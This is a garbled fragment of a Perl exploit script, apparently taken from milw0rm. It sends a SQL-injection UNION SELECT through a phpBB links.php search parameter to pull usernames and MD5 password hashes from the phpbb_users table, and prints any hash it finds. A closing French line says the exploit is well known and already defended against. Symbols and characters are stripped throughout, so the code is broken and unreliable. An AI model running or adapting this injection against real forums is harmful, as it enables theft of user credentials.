links.php?t=searchsearch_keywords=asdstart=1120UNION20SELECT201usernameuser_password45678910111220FROM20phpbb_users20WHERE20user_id=.user./;  print   Exploit in process...\r\n;  socket = IO::Socket::INET>new  Proto => tcp  PeerAddr => server  PeerPort => 80 || die Exploit failed;  print Exploit\r\n;  print in process...\r\n;  print socket GET path HTTP/1.1\r\n;  print socket Host: server\r\n;  print socket Accept: /\r\n;  print socket Connection: close\r\n\r\n;  print Exploit finished\r\n\r\n;  while answer = <socket>  {  if answer =~/\w{32}/  {  if 1 ne 0 {  print MD5Hash is: .1.\r\n;  }  exit;  }  }    milw0rm.com [20070831]      Attention cet exploit est trÃ¨s connu et de nombreuses protections existent dÃ©ja.